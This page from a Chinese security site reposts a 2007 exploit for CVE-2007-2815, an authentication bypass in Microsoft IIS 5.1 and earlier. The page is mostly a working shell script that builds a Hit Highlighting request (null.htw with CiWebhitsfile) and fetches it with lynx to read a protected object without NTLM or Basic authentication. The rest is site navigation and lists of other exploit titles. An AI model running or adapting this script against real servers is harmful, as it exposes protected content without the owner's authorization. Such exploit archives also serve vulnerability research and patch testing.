首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
来源:sha0[at]badchecksum.net 作者:sha0 发布时间:2007-06-04  
#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pheap 2.0 Admin Bypass / Remot
·IE6 / Provideo Camimage (ISSCa
·Inout Search Engine (all versi
·DVD X Player 4.1 Professional
·IBM Tivoli Provisioning Manage
·Apache 2.0.58 mod_rewrite Remo
·Sendcard <= 3.4.1 (Local File
·Joomla Component Phil-a-Form <
·EQdkp <= 1.3.2 (listmembers.ph
·UltraISO <= 8.6.2.2011 (Cue/Bi
·HP Tru64 Remote Secure Shell U
·Fundanemt <= 2.2.0 (spellcheck
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved